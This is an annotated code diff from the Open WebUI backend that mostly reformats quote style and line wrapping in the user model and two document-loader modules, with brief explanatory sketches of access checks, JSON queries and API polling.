-                AccessGrants.revoke_all_access("tool", id, db=db)
+                AccessGrants.revoke_all_access('tool', id, db=db)
                db.query(Tool).filter_by(id=id).delete()
                db.commit()
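Note that get_tools_by_user_id filters in Python rather than in SQL: a tool is visible if the user owns it, or if AccessGrants.has_access reports a grant for the requested permission, with the user's group ids computed once up front. Conceptually the visibility check reduces to something like the sketch below (illustrative only; grant objects are assumed to carry permission, user_id, and group_id fields, which the excerpt does not show):

    def visible(tool, user_id: str, permission: str,
                user_group_ids: set[str], grants: list) -> bool:
        # The owner always sees their own tool.
        if tool.user_id == user_id:
            return True
        # Otherwise, look for a grant that targets the user directly
        # or one of the groups the user belongs to.
        return any(
            g.permission == permission
            and (g.user_id == user_id or g.group_id in user_group_ids)
            for g in grants
        )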
backend/open_webui/models/users.py  +85 −142  modified

@@ -40,12 +40,12 @@

class UserSettings(BaseModel):
    ui: Optional[dict] = {}
-    model_config = ConfigDict(extra="allow")
+    model_config = ConfigDict(extra='allow')
    pass


class User(Base):
-    __tablename__ = "user"
+    __tablename__ = 'user'

    id = Column(String, primary_key=True, unique=True)
    email = Column(String)
@@ -83,7 +83,7 @@ class UserModel(BaseModel):
    email: str
    username: Optional[str] = None

-    role: str = "pending"
+    role: str = 'pending'
    name: str
@@ -112,10 +112,10 @@ class UserModel(BaseModel):

    model_config = ConfigDict(from_attributes=True)

-    @model_validator(mode="after")
+    @model_validator(mode='after')
    def set_profile_image_url(self):
        if not self.profile_image_url:
-            self.profile_image_url = f"/api/v1/users/{self.id}/profile/image"
+            self.profile_image_url = f'/api/v1/users/{self.id}/profile/image'
        return self
@@ -126,7 +126,7 @@ class UserStatusModel(UserModel):

class ApiKey(Base):
-    __tablename__ = "api_key"
+    __tablename__ = 'api_key'

    id = Column(Text, primary_key=True, unique=True)
    user_id = Column(Text, nullable=False)
@@ -163,7 +163,7 @@ class UpdateProfileForm(BaseModel):
    gender: Optional[str] = None
    date_of_birth: Optional[datetime.date] = None

-    @field_validator("profile_image_url")
+    @field_validator('profile_image_url')
    @classmethod
    def check_profile_image_url(cls, v: str) -> str:
        return validate_profile_image_url(v)
@@ -174,7 +174,7 @@ class UserGroupIdsModel(UserModel):

class UserModelResponse(UserModel):
-    model_config = ConfigDict(extra="allow")
+    model_config = ConfigDict(extra='allow')


class UserListResponse(BaseModel):
@@ -251,7 +251,7 @@ class UserUpdateForm(BaseModel):
    profile_image_url: str
    password: Optional[str] = None

-    @field_validator("profile_image_url")
+    @field_validator('profile_image_url')
    @classmethod
    def check_profile_image_url(cls, v: str) -> str:
        return validate_profile_image_url(v)
@@ -263,25 +263,25 @@ def insert_new_user(
        id: str,
        name: str,
        email: str,
-        profile_image_url: str = "/user.png",
-        role: str = "pending",
+        profile_image_url: str = '/user.png',
+        role: str = 'pending',
        username: Optional[str] = None,
        oauth: Optional[dict] = None,
        db: Optional[Session] = None,
    ) -> Optional[UserModel]:
        with get_db_context(db) as db:
            user = UserModel(
                **{
-                    "id": id,
-                    "email": email,
-                    "name": name,
-                    "role": role,
-                    "profile_image_url": profile_image_url,
-                    "last_active_at": int(time.time()),
-                    "created_at": int(time.time()),
-                    "updated_at": int(time.time()),
-                    "username": username,
-                    "oauth": oauth,
+                    'id': id,
+                    'email': email,
+                    'name': name,
+                    'role': role,
+                    'profile_image_url': profile_image_url,
+                    'last_active_at': int(time.time()),
+                    'created_at': int(time.time()),
+                    'updated_at': int(time.time()),
+                    'username': username,
+                    'oauth': oauth,
                }
            )
            result = User(**user.model_dump())
@@ -293,59 +293,40 @@ def insert_new_user(
            else:
                return None

-    def get_user_by_id(
-        self, id: str, db: Optional[Session] = None
-    ) -> Optional[UserModel]:
+    def get_user_by_id(self, id: str, db: Optional[Session] = None) -> Optional[UserModel]:
        try:
            with get_db_context(db) as db:
                user = db.query(User).filter_by(id=id).first()
                return UserModel.model_validate(user)
        except Exception:
            return None

-    def get_user_by_api_key(
-        self, api_key: str, db: Optional[Session] = None
-    ) -> Optional[UserModel]:
+    def get_user_by_api_key(self, api_key: str, db: Optional[Session] = None) -> Optional[UserModel]:
        try:
            with get_db_context(db) as db:
-                user = (
-                    db.query(User)
-                    .join(ApiKey, User.id == ApiKey.user_id)
-                    .filter(ApiKey.key == api_key)
-                    .first()
-                )
+                user = db.query(User).join(ApiKey, User.id == ApiKey.user_id).filter(ApiKey.key == api_key).first()
                return UserModel.model_validate(user) if user else None
        except Exception:
            return None

-    def get_user_by_email(
-        self, email: str, db: Optional[Session] = None
-    ) -> Optional[UserModel]:
+    def get_user_by_email(self, email: str, db: Optional[Session] = None) -> Optional[UserModel]:
        try:
            with get_db_context(db) as db:
-                user = (
-                    db.query(User)
-                    .filter(func.lower(User.email) == email.lower())
-                    .first()
-                )
+                user = db.query(User).filter(func.lower(User.email) == email.lower()).first()
                return UserModel.model_validate(user) if user else None
        except Exception:
            return None

-    def get_user_by_oauth_sub(
-        self, provider: str, sub: str, db: Optional[Session] = None
-    ) -> Optional[UserModel]:
+    def get_user_by_oauth_sub(self, provider: str, sub: str, db: Optional[Session] = None) -> Optional[UserModel]:
        try:
            with get_db_context(db) as db:  # type: Session
                dialect_name = db.bind.dialect.name
                query = db.query(User)

-                if dialect_name == "sqlite":
-                    query = query.filter(User.oauth.contains({provider: {"sub": sub}}))
-                elif dialect_name == "postgresql":
-                    query = query.filter(
-                        User.oauth[provider].cast(JSONB)["sub"].astext == sub
-                    )
+                if dialect_name == 'sqlite':
+                    query = query.filter(User.oauth.contains({provider: {'sub': sub}}))
+                elif dialect_name == 'postgresql':
+                    query = query.filter(User.oauth[provider].cast(JSONB)['sub'].astext == sub)

                user = query.first()
                return UserModel.model_validate(user) if user else None
@@ -361,15 +342,10 @@ def get_user_by_scim_external_id(
                dialect_name = db.bind.dialect.name
                query = db.query(User)

-                if dialect_name == "sqlite":
-                    query = query.filter(
-                        User.scim.contains({provider: {"external_id": external_id}})
-                    )
-                elif dialect_name == "postgresql":
-                    query = query.filter(
-                        User.scim[provider].cast(JSONB)["external_id"].astext
-                        == external_id
-                    )
+                if dialect_name == 'sqlite':
+                    query = query.filter(User.scim.contains({provider: {'external_id': external_id}}))
+                elif dialect_name == 'postgresql':
+                    query = query.filter(User.scim[provider].cast(JSONB)['external_id'].astext == external_id)

                user = query.first()
                return UserModel.model_validate(user) if user else None
@@ -388,16 +364,16 @@ def get_users(
            query = db.query(User).options(defer(User.profile_image_url))

            if filter:
-                query_key = filter.get("query")
+                query_key = filter.get('query')
                if query_key:
                    query = query.filter(
                        or_(
-                            User.name.ilike(f"%{query_key}%"),
-                            User.email.ilike(f"%{query_key}%"),
+                            User.name.ilike(f'%{query_key}%'),
+                            User.email.ilike(f'%{query_key}%'),
                        )
                    )

-                channel_id = filter.get("channel_id")
+                channel_id = filter.get('channel_id')
                if channel_id:
                    query = query.filter(
                        exists(
@@ -408,13 +384,13 @@ def get_users(
                        )
                    )

-                user_ids = filter.get("user_ids")
-                group_ids = filter.get("group_ids")
+                user_ids = filter.get('user_ids')
+                group_ids = filter.get('group_ids')

                if isinstance(user_ids, list) and isinstance(group_ids, list):
                    # If both are empty lists, return no users
                    if not user_ids and not group_ids:
-                        return {"users": [], "total": 0}
+                        return {'users': [], 'total': 0}

                    if user_ids:
                        query = query.filter(User.id.in_(user_ids))
@@ -429,21 +405,21 @@ def get_users(
                        )
                    )

-                roles = filter.get("roles")
+                roles = filter.get('roles')
                if roles:
-                    include_roles = [role for role in roles if not role.startswith("!")]
-                    exclude_roles = [role[1:] for role in roles if role.startswith("!")]
+                    include_roles = [role for role in roles if not role.startswith('!')]
+                    exclude_roles = [role[1:] for role in roles if role.startswith('!')]

                    if include_roles:
                        query = query.filter(User.role.in_(include_roles))
                    if exclude_roles:
                        query = query.filter(~User.role.in_(exclude_roles))

-                order_by = filter.get("order_by")
-                direction = filter.get("direction")
+                order_by = filter.get('order_by')
+                direction = filter.get('direction')

-                if order_by and order_by.startswith("group_id:"):
-                    group_id = order_by.split(":", 1)[1]
+                if order_by and order_by.startswith('group_id:'):
+                    group_id = order_by.split(':', 1)[1]

                    # Subquery that checks if the user belongs to the group
                    membership_exists = exists(
@@ -456,42 +432,42 @@ def get_users(
                    # CASE: user in group → 1, user not in group → 0
                    group_sort = case((membership_exists, 1), else_=0)

-                    if direction == "asc":
+                    if direction == 'asc':
                        query = query.order_by(group_sort.asc(), User.name.asc())
                    else:
                        query = query.order_by(group_sort.desc(), User.name.asc())
-                elif order_by == "name":
-                    if direction == "asc":
+                elif order_by == 'name':
+                    if direction == 'asc':
                        query = query.order_by(User.name.asc())
                    else:
                        query = query.order_by(User.name.desc())
-                elif order_by == "email":
-                    if direction == "asc":
+                elif order_by == 'email':
+                    if direction == 'asc':
                        query = query.order_by(User.email.asc())
                    else:
                        query = query.order_by(User.email.desc())
-                elif order_by == "created_at":
-                    if direction == "asc":
+                elif order_by == 'created_at':
+                    if direction == 'asc':
                        query = query.order_by(User.created_at.asc())
                    else:
                        query = query.order_by(User.created_at.desc())
-                elif order_by == "last_active_at":
-                    if direction == "asc":
+                elif order_by == 'last_active_at':
+                    if direction == 'asc':
                        query = query.order_by(User.last_active_at.asc())
                    else:
                        query = query.order_by(User.last_active_at.desc())
-                elif order_by == "updated_at":
-                    if direction == "asc":
+                elif order_by == 'updated_at':
+                    if direction == 'asc':
                        query = query.order_by(User.updated_at.asc())
                    else:
                        query = query.order_by(User.updated_at.desc())
-                elif order_by == "role":
-                    if direction == "asc":
+                elif order_by == 'role':
+                    if direction == 'asc':
                        query = query.order_by(User.role.asc())
                    else:
                        query = query.order_by(User.role.desc())
@@ -510,13 +486,11 @@ def get_users(
            users = query.all()

            return {
-                "users": [UserModel.model_validate(user) for user in users],
-                "total": total,
+                'users': [UserModel.model_validate(user) for user in users],
+                'total': total,
            }

-    def get_users_by_group_id(
-        self, group_id: str, db: Optional[Session] = None
-    ) -> list[UserModel]:
+    def get_users_by_group_id(self, group_id: str, db: Optional[Session] = None) -> list[UserModel]:
        with get_db_context(db) as db:
            users = (
                db.query(User)
@@ -527,16 +501,9 @@ def get_users_by_group_id(
            )
            return [UserModel.model_validate(user) for user in users]

-    def get_users_by_user_ids(
-        self, user_ids: list[str], db: Optional[Session] = None
-    ) -> list[UserStatusModel]:
+    def get_users_by_user_ids(self, user_ids: list[str], db: Optional[Session] = None) -> list[UserStatusModel]:
        with get_db_context(db) as db:
-            users = (
-                db.query(User)
-                .options(defer(User.profile_image_url))
-                .filter(User.id.in_(user_ids))
-                .all()
-            )
+            users = db.query(User).options(defer(User.profile_image_url)).filter(User.id.in_(user_ids)).all()
            return [UserModel.model_validate(user) for user in users]

    def get_num_users(self, db: Optional[Session] = None) -> Optional[int]:
@@ -555,36 +522,26 @@ def get_first_user(self, db: Optional[Session] = None) -> UserModel:
        except Exception:
            return None

-    def get_user_webhook_url_by_id(
-        self, id: str, db: Optional[Session] = None
-    ) -> Optional[str]:
+    def get_user_webhook_url_by_id(self, id: str, db: Optional[Session] = None) -> Optional[str]:
        try:
            with get_db_context(db) as db:
                user = db.query(User).filter_by(id=id).first()

                if user.settings is None:
                    return None
                else:
-                    return (
-                        user.settings.get("ui", {})
-                        .get("notifications", {})
-                        .get("webhook_url", None)
-                    )
+                    return user.settings.get('ui', {}).get('notifications', {}).get('webhook_url', None)
        except Exception:
            return None

    def get_num_users_active_today(self, db: Optional[Session] = None) -> Optional[int]:
        with get_db_context(db) as db:
            current_timestamp = int(datetime.datetime.now().timestamp())
            today_midnight_timestamp = current_timestamp - (current_timestamp % 86400)
-            query = db.query(User).filter(
-                User.last_active_at > today_midnight_timestamp
-            )
+            query = db.query(User).filter(User.last_active_at > today_midnight_timestamp)
            return query.count()

-    def update_user_role_by_id(
-        self, id: str, role: str, db: Optional[Session] = None
-    ) -> Optional[UserModel]:
+    def update_user_role_by_id(self, id: str, role: str, db: Optional[Session] = None) -> Optional[UserModel]:
        try:
            with get_db_context(db) as db:
                user = db.query(User).filter_by(id=id).first()
@@ -629,9 +586,7 @@ def update_user_profile_image_url_by_id(
        return None

    @throttle(DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL)
-    def update_last_active_by_id(
-        self, id: str, db: Optional[Session] = None
-    ) -> Optional[UserModel]:
+    def update_last_active_by_id(self, id: str, db: Optional[Session] = None) -> Optional[UserModel]:
        try:
            with get_db_context(db) as db:
                user = db.query(User).filter_by(id=id).first()
@@ -665,10 +620,10 @@ def update_user_oauth_by_id(
                oauth = user.oauth or {}

                # Update or insert provider entry
-                oauth[provider] = {"sub": sub}
+                oauth[provider] = {'sub': sub}

                # Persist updated JSON
-                db.query(User).filter_by(id=id).update({"oauth": oauth})
+                db.query(User).filter_by(id=id).update({'oauth': oauth})
                db.commit()

                return UserModel.model_validate(user)
@@ -698,19 +653,17 @@ def update_user_scim_by_id(
                    return None

                scim = user.scim or {}
-                scim[provider] = {"external_id": external_id}
+                scim[provider] = {'external_id': external_id}

-                db.query(User).filter_by(id=id).update({"scim": scim})
+                db.query(User).filter_by(id=id).update({'scim': scim})
                db.commit()

                return UserModel.model_validate(user)
        except Exception:
            return None

-    def update_user_by_id(
-        self, id: str, updated: dict, db: Optional[Session] = None
-    ) -> Optional[UserModel]:
+    def update_user_by_id(self, id: str, updated: dict, db: Optional[Session] = None) -> Optional[UserModel]:
        try:
            with get_db_context(db) as db:
                user = db.query(User).filter_by(id=id).first()
@@ -725,9 +678,7 @@ def update_user_by_id(
            print(e)
            return None

-    def update_user_settings_by_id(
-        self, id: str, updated: dict, db: Optional[Session] = None
-    ) -> Optional[UserModel]:
+    def update_user_settings_by_id(self, id: str, updated: dict, db: Optional[Session] = None) -> Optional[UserModel]:
        try:
            with get_db_context(db) as db:
                user = db.query(User).filter_by(id=id).first()
@@ -741,7 +692,7 @@ def update_user_settings_by_id(

                user_settings.update(updated)

-                db.query(User).filter_by(id=id).update({"settings": user_settings})
+                db.query(User).filter_by(id=id).update({'settings': user_settings})
                db.commit()

                user = db.query(User).filter_by(id=id).first()
@@ -768,27 +719,23 @@ def delete_user_by_id(self, id: str, db: Optional[Session] = None) -> bool:
        except Exception:
            return False

-    def get_user_api_key_by_id(
-        self, id: str, db: Optional[Session] = None
-    ) -> Optional[str]:
+    def get_user_api_key_by_id(self, id: str, db: Optional[Session] = None) -> Optional[str]:
        try:
            with get_db_context(db) as db:
                api_key = db.query(ApiKey).filter_by(user_id=id).first()
                return api_key.key if api_key else None
        except Exception:
            return None

-    def update_user_api_key_by_id(
-        self, id: str, api_key: str, db: Optional[Session] = None
-    ) -> bool:
+    def update_user_api_key_by_id(self, id: str, api_key: str, db: Optional[Session] = None) -> bool:
        try:
            with get_db_context(db) as db:
                db.query(ApiKey).filter_by(user_id=id).delete()
                db.commit()

                now = int(time.time())
                new_api_key = ApiKey(
-                    id=f"key_{id}",
+                    id=f'key_{id}',
                    user_id=id,
                    key=api_key,
                    created_at=now,
@@ -811,16 +758,14 @@ def delete_user_api_key_by_id(self, id: str, db: Optional[Session] = None) -> bo
        except Exception:
            return False

-    def get_valid_user_ids(
-        self, user_ids: list[str], db: Optional[Session] = None
-    ) -> list[str]:
+    def get_valid_user_ids(self, user_ids: list[str], db: Optional[Session] = None) -> list[str]:
        with get_db_context(db) as db:
            users = db.query(User).filter(User.id.in_(user_ids)).all()
            return [user.id for user in users]

    def get_super_admin_user(self, db: Optional[Session] = None) -> Optional[UserModel]:
        with get_db_context(db) as db:
-            user = db.query(User).filter_by(role="admin").first()
+            user = db.query(User).filter_by(role='admin').first()
            if user:
                return UserModel.model_validate(user)
            else:
@@ -830,9 +775,7 @@ def get_active_user_count(self, db: Optional[Session] = None) -> int:
        with get_db_context(db) as db:
            # Consider user active if last_active_at within the last 3 minutes
            three_minutes_ago = int(time.time()) - 180
-            count = (
-                db.query(User).filter(User.last_active_at >= three_minutes_ago).count()
-            )
+            count = db.query(User).filter(User.last_active_at >= three_minutes_ago).count()
            return count

    @staticmethod
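The oauth and scim lookups above branch on the SQLAlchemy dialect because JSON querying differs between backends: SQLite gets a containment test on the JSON column, while PostgreSQL indexes into the JSON, casts to JSONB, and compares the extracted text. A self-contained sketch of the same pattern against a toy table (the Account table and find_by_oauth_sub are illustrative stand-ins, not the Open WebUI schema):

    from sqlalchemy import Column, String, JSON
    from sqlalchemy.dialects.postgresql import JSONB
    from sqlalchemy.orm import Session, declarative_base

    Base = declarative_base()

    class Account(Base):  # hypothetical table for illustration
        __tablename__ = 'account'
        id = Column(String, primary_key=True)
        oauth = Column(JSON, nullable=True)

    def find_by_oauth_sub(db: Session, provider: str, sub: str):
        query = db.query(Account)
        if db.bind.dialect.name == 'sqlite':
            # SQLite: JSON containment test on the column value.
            query = query.filter(Account.oauth.contains({provider: {'sub': sub}}))
        elif db.bind.dialect.name == 'postgresql':
            # PostgreSQL: index into the JSON, cast to JSONB, compare as text.
            query = query.filter(Account.oauth[provider].cast(JSONB)['sub'].astext == sub)
        return query.first()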
backend/open_webui/retrieval/loaders/datalab_marker.py  +91 −110  modified

@@ -40,108 +40,102 @@ def __init__(
        self.output_format = output_format

    def _get_mime_type(self, filename: str) -> str:
-        ext = filename.rsplit(".", 1)[-1].lower()
+        ext = filename.rsplit('.', 1)[-1].lower()
        mime_map = {
-            "pdf": "application/pdf",
-            "xls": "application/vnd.ms-excel",
-            "xlsx": "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet",
-            "ods": "application/vnd.oasis.opendocument.spreadsheet",
-            "doc": "application/msword",
-            "docx": "application/vnd.openxmlformats-officedocument.wordprocessingml.document",
-            "odt": "application/vnd.oasis.opendocument.text",
-            "ppt": "application/vnd.ms-powerpoint",
-            "pptx": "application/vnd.openxmlformats-officedocument.presentationml.presentation",
-            "odp": "application/vnd.oasis.opendocument.presentation",
-            "html": "text/html",
-            "epub": "application/epub+zip",
-            "png": "image/png",
-            "jpeg": "image/jpeg",
-            "jpg": "image/jpeg",
-            "webp": "image/webp",
-            "gif": "image/gif",
-            "tiff": "image/tiff",
+            'pdf': 'application/pdf',
+            'xls': 'application/vnd.ms-excel',
+            'xlsx': 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
+            'ods': 'application/vnd.oasis.opendocument.spreadsheet',
+            'doc': 'application/msword',
+            'docx': 'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
+            'odt': 'application/vnd.oasis.opendocument.text',
+            'ppt': 'application/vnd.ms-powerpoint',
+            'pptx': 'application/vnd.openxmlformats-officedocument.presentationml.presentation',
+            'odp': 'application/vnd.oasis.opendocument.presentation',
+            'html': 'text/html',
+            'epub': 'application/epub+zip',
+            'png': 'image/png',
+            'jpeg': 'image/jpeg',
+            'jpg': 'image/jpeg',
+            'webp': 'image/webp',
+            'gif': 'image/gif',
+            'tiff': 'image/tiff',
        }
-        return mime_map.get(ext, "application/octet-stream")
+        return mime_map.get(ext, 'application/octet-stream')

    def check_marker_request_status(self, request_id: str) -> dict:
-        url = f"{self.api_base_url}/{request_id}"
-        headers = {"X-Api-Key": self.api_key}
+        url = f'{self.api_base_url}/{request_id}'
+        headers = {'X-Api-Key': self.api_key}
        try:
            response = requests.get(url, headers=headers)
            response.raise_for_status()
            result = response.json()
-            log.info(f"Marker API status check for request {request_id}: {result}")
+            log.info(f'Marker API status check for request {request_id}: {result}')
            return result
        except requests.HTTPError as e:
-            log.error(f"Error checking Marker request status: {e}")
+            log.error(f'Error checking Marker request status: {e}')
            raise HTTPException(
                status.HTTP_502_BAD_GATEWAY,
-                detail=f"Failed to check Marker request: {e}",
+                detail=f'Failed to check Marker request: {e}',
            )
        except ValueError as e:
-            log.error(f"Invalid JSON checking Marker request: {e}")
-            raise HTTPException(
-                status.HTTP_502_BAD_GATEWAY, detail=f"Invalid JSON: {e}"
-            )
+            log.error(f'Invalid JSON checking Marker request: {e}')
+            raise HTTPException(status.HTTP_502_BAD_GATEWAY, detail=f'Invalid JSON: {e}')

    def load(self) -> List[Document]:
        filename = os.path.basename(self.file_path)
        mime_type = self._get_mime_type(filename)
-        headers = {"X-Api-Key": self.api_key}
+        headers = {'X-Api-Key': self.api_key}

        form_data = {
-            "use_llm": str(self.use_llm).lower(),
-            "skip_cache": str(self.skip_cache).lower(),
-            "force_ocr": str(self.force_ocr).lower(),
-            "paginate": str(self.paginate).lower(),
-            "strip_existing_ocr": str(self.strip_existing_ocr).lower(),
-            "disable_image_extraction": str(self.disable_image_extraction).lower(),
-            "format_lines": str(self.format_lines).lower(),
-            "output_format": self.output_format,
+            'use_llm': str(self.use_llm).lower(),
+            'skip_cache': str(self.skip_cache).lower(),
+            'force_ocr': str(self.force_ocr).lower(),
+            'paginate': str(self.paginate).lower(),
+            'strip_existing_ocr': str(self.strip_existing_ocr).lower(),
+            'disable_image_extraction': str(self.disable_image_extraction).lower(),
+            'format_lines': str(self.format_lines).lower(),
+            'output_format': self.output_format,
        }
        if self.additional_config and self.additional_config.strip():
-            form_data["additional_config"] = self.additional_config
+            form_data['additional_config'] = self.additional_config

        log.info(
            f"Datalab Marker POST request parameters: {{'filename': '{filename}', 'mime_type': '{mime_type}', **{form_data}}}"
        )

        try:
-            with open(self.file_path, "rb") as f:
-                files = {"file": (filename, f, mime_type)}
+            with open(self.file_path, 'rb') as f:
+                files = {'file': (filename, f, mime_type)}
                response = requests.post(
-                    f"{self.api_base_url}",
+                    f'{self.api_base_url}',
                    data=form_data,
                    files=files,
                    headers=headers,
                )
                response.raise_for_status()
                result = response.json()
        except FileNotFoundError:
-            raise HTTPException(
-                status.HTTP_404_NOT_FOUND, detail=f"File not found: {self.file_path}"
-            )
+            raise HTTPException(status.HTTP_404_NOT_FOUND, detail=f'File not found: {self.file_path}')
        except requests.HTTPError as e:
            raise HTTPException(
                status.HTTP_400_BAD_REQUEST,
-                detail=f"Datalab Marker request failed: {e}",
+                detail=f'Datalab Marker request failed: {e}',
            )
        except ValueError as e:
-            raise HTTPException(
-                status.HTTP_502_BAD_GATEWAY, detail=f"Invalid JSON response: {e}"
-            )
+            raise HTTPException(status.HTTP_502_BAD_GATEWAY, detail=f'Invalid JSON response: {e}')
        except Exception as e:
            raise HTTPException(status.HTTP_500_INTERNAL_SERVER_ERROR, detail=str(e))

-        if not result.get("success"):
+        if not result.get('success'):
            raise HTTPException(
                status.HTTP_400_BAD_REQUEST,
-                detail=f"Datalab Marker request failed: {result.get('error', 'Unknown error')}",
+                detail=f'Datalab Marker request failed: {result.get("error", "Unknown error")}',
            )

-        check_url = result.get("request_check_url")
-        request_id = result.get("request_id")
+        check_url = result.get('request_check_url')
+        request_id = result.get('request_id')

        # Check if this is a direct response (self-hosted) or polling response (DataLab)
        if check_url:
@@ -154,54 +148,45 @@ def load(self) -> List[Document]:
                    poll_result = poll_response.json()
                except (requests.HTTPError, ValueError) as e:
                    raw_body = poll_response.text
-                    log.error(f"Polling error: {e}, response body: {raw_body}")
-                    raise HTTPException(
-                        status.HTTP_502_BAD_GATEWAY, detail=f"Polling failed: {e}"
-                    )
+                    log.error(f'Polling error: {e}, response body: {raw_body}')
+                    raise HTTPException(status.HTTP_502_BAD_GATEWAY, detail=f'Polling failed: {e}')

-                status_val = poll_result.get("status")
-                success_val = poll_result.get("success")
+                status_val = poll_result.get('status')
+                success_val = poll_result.get('success')

-                if status_val == "complete":
+                if status_val == 'complete':
                    summary = {
                        k: poll_result.get(k)
                        for k in (
-                            "status",
-                            "output_format",
-                            "success",
-                            "error",
-                            "page_count",
-                            "total_cost",
+                            'status',
+                            'output_format',
+                            'success',
+                            'error',
+                            'page_count',
+                            'total_cost',
                        )
                    }
-                    log.info(
-                        f"Marker processing completed successfully: {json.dumps(summary, indent=2)}"
-                    )
+                    log.info(f'Marker processing completed successfully: {json.dumps(summary, indent=2)}')
                    break

-                if status_val == "failed" or success_val is False:
-                    log.error(
-                        f"Marker poll failed full response: {json.dumps(poll_result, indent=2)}"
-                    )
-                    error_msg = (
-                        poll_result.get("error")
-                        or "Marker returned failure without error message"
-                    )
+                if status_val == 'failed' or success_val is False:
+                    log.error(f'Marker poll failed full response: {json.dumps(poll_result, indent=2)}')
+                    error_msg = poll_result.get('error') or 'Marker returned failure without error message'
                    raise HTTPException(
                        status.HTTP_400_BAD_REQUEST,
-                        detail=f"Marker processing failed: {error_msg}",
+                        detail=f'Marker processing failed: {error_msg}',
                    )
            else:
                raise HTTPException(
                    status.HTTP_504_GATEWAY_TIMEOUT,
-                    detail="Marker processing timed out",
+                    detail='Marker processing timed out',
                )

-            if not poll_result.get("success", False):
-                error_msg = poll_result.get("error") or "Unknown processing error"
+            if not poll_result.get('success', False):
+                error_msg = poll_result.get('error') or 'Unknown processing error'
                raise HTTPException(
                    status.HTTP_400_BAD_REQUEST,
-                    detail=f"Final processing failed: {error_msg}",
+                    detail=f'Final processing failed: {error_msg}',
                )

            # DataLab format - content in format-specific fields
@@ -210,69 +195,65 @@ def load(self) -> List[Document]:
            final_result = poll_result
        else:
            # Self-hosted direct response - content in "output" field
-            if "output" in result:
-                log.info("Self-hosted Marker returned direct response without polling")
-                raw_content = result.get("output")
+            if 'output' in result:
+                log.info('Self-hosted Marker returned direct response without polling')
+                raw_content = result.get('output')
                final_result = result
            else:
-                available_fields = (
-                    list(result.keys())
-                    if isinstance(result, dict)
-                    else "non-dict response"
-                )
+                available_fields = list(result.keys()) if isinstance(result, dict) else 'non-dict response'
                raise HTTPException(
                    status.HTTP_502_BAD_GATEWAY,
                    detail=f"Custom Marker endpoint returned success but no 'output' field found. Available fields: {available_fields}. Expected either 'request_check_url' for polling or 'output' field for direct response.",
                )

-        if self.output_format.lower() == "json":
+        if self.output_format.lower() == 'json':
            full_text = json.dumps(raw_content, indent=2)
-        elif self.output_format.lower() in {"markdown", "html"}:
+        elif self.output_format.lower() in {'markdown', 'html'}:
            full_text = str(raw_content).strip()
        else:
            raise HTTPException(
                status.HTTP_400_BAD_REQUEST,
-                detail=f"Unsupported output format: {self.output_format}",
+                detail=f'Unsupported output format: {self.output_format}',
            )

        if not full_text:
            raise HTTPException(
                status.HTTP_400_BAD_REQUEST,
-                detail="Marker returned empty content",
+                detail='Marker returned empty content',
            )

-        marker_output_dir = os.path.join("/app/backend/data/uploads", "marker_output")
+        marker_output_dir = os.path.join('/app/backend/data/uploads', 'marker_output')
        os.makedirs(marker_output_dir, exist_ok=True)

-        file_ext_map = {"markdown": "md", "json": "json", "html": "html"}
-        file_ext = file_ext_map.get(self.output_format.lower(), "txt")
-        output_filename = f"{os.path.splitext(filename)[0]}.{file_ext}"
+        file_ext_map = {'markdown': 'md', 'json': 'json', 'html': 'html'}
+        file_ext = file_ext_map.get(self.output_format.lower(), 'txt')
+        output_filename = f'{os.path.splitext(filename)[0]}.{file_ext}'
        output_path = os.path.join(marker_output_dir, output_filename)

        try:
-            with open(output_path, "w", encoding="utf-8") as f:
+            with open(output_path, 'w', encoding='utf-8') as f:
                f.write(full_text)
-            log.info(f"Saved Marker output to: {output_path}")
+            log.info(f'Saved Marker output to: {output_path}')
        except Exception as e:
-            log.warning(f"Failed to write marker output to disk: {e}")
+            log.warning(f'Failed to write marker output to disk: {e}')

        metadata = {
-            "source": filename,
-            "output_format": final_result.get("output_format", self.output_format),
-            "page_count": final_result.get("page_count", 0),
-            "processed_with_llm": self.use_llm,
-            "request_id": request_id or "",
+            'source': filename,
+            'output_format': final_result.get('output_format', self.output_format),
+            'page_count': final_result.get('page_count', 0),
+            'processed_with_llm': self.use_llm,
+            'request_id': request_id or '',
        }

-        images = final_result.get("images", {})
+        images = final_result.get('images', {})
        if images:
-            metadata["image_count"] = len(images)
-            metadata["images"] = json.dumps(list(images.keys()))
+            metadata['image_count'] = len(images)
+            metadata['images'] = json.dumps(list(images.keys()))

        for k, v in metadata.items():
            if isinstance(v, (dict, list)):
                metadata[k] = json.dumps(v)
            elif v is None:
-                metadata[k] = ""
+                metadata[k] = ''

        return [Document(page_content=full_text, metadata=metadata)]
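The load flow above is: POST the file, then, if the response carries request_check_url, poll that URL until status becomes 'complete' or 'failed', falling through to the 504 when the loop exhausts its attempts; a self-hosted Marker instead returns the content directly in an 'output' field. Stripped of the Open WebUI error handling, the polling skeleton looks roughly like this (the attempt count and sleep interval are illustrative; the excerpt does not show the actual values):

    import time
    import requests

    def poll_marker(check_url: str, headers: dict,
                    attempts: int = 30, interval: float = 2.0) -> dict:
        for _ in range(attempts):
            time.sleep(interval)
            poll_result = requests.get(check_url, headers=headers).json()
            if poll_result.get('status') == 'complete':
                return poll_result
            # DataLab signals failure either via status or an explicit success flag.
            if poll_result.get('status') == 'failed' or poll_result.get('success') is False:
                raise RuntimeError(poll_result.get('error') or 'Marker returned failure')
        raise TimeoutError('Marker processing timed out')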
backend/open_webui/retrieval/loaders/external_document.py  +15 −18  modified

@@ -29,61 +29,58 @@ def __init__(
        self.user = user

    def load(self) -> List[Document]:
-        with open(self.file_path, "rb") as f:
+        with open(self.file_path, 'rb') as f:
            data = f.read()

        headers = {}
        if self.mime_type is not None:
-            headers["Content-Type"] = self.mime_type
+            headers['Content-Type'] = self.mime_type

        if self.api_key is not None:
-            headers["Authorization"] = f"Bearer {self.api_key}"
+            headers['Authorization'] = f'Bearer {self.api_key}'

        try:
-            headers["X-Filename"] = quote(os.path.basename(self.file_path))
+            headers['X-Filename'] = quote(os.path.basename(self.file_path))
        except Exception:
            pass

        if self.user is not None:
            headers = include_user_info_headers(headers, self.user)

        url = self.url
-        if url.endswith("/"):
+        if url.endswith('/'):
            url = url[:-1]

        try:
-            response = requests.put(f"{url}/process", data=data, headers=headers)
+            response = requests.put(f'{url}/process', data=data, headers=headers)
        except Exception as e:
-            log.error(f"Error connecting to endpoint: {e}")
-            raise Exception(f"Error connecting to endpoint: {e}")
+            log.error(f'Error connecting to endpoint: {e}')
